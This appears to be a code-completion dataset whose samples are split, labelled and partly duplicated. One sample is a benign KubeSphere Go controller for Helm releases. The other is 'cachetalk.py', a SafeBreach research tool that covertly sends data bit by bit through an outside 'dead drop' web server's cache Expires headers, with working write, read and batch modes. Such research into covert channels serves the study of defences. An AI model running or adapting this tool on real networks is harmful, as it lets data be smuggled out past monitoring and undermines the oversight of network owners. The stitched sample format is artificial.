// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then lets add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// Host cluster will self-healing, delete host cluster won't cause deletion of helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleting
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too much times, exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus})
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil |
return nil
}
func (r *ReconcileHelmRelease) uninstallHelmRelease(rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If user deletes helmRelease first and then delete cluster immediately, this may cause helm resources leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
}
| {
return errors.New(res.Message)
} | conditional_block |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileWorkspace reconciles a Workspace object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads that state of the cluster for a helmreleases object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then lets add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// Host cluster will self-healing, delete host cluster won't cause deletion of helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleting
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too much times, exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus})
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error |
func (r *ReconcileHelmRelease) uninstallHelmRelease(rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If user deletes helmRelease first and then delete cluster immediately, this may cause helm resources leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
}
| {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil {
return errors.New(res.Message)
}
return nil
} | identifier_body |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
def __str2bits(string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary, use the str repr to convert to list, skip 2 bytes to jump over '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# We're using .pop() so it's reverse() the order of the list
bits.reverse()
return bits
def main(args):
parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta') |
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happened when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read, append bit to bits array depends on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write, pop bit form the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv)) | group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url | random_line_split |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
def __str2bits(string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary, use the str repr to convert to list, skip 2 bytes to jump over '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# We're using .pop() so it's reverse() the order of the list
bits.reverse()
return bits
def main(args):
parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
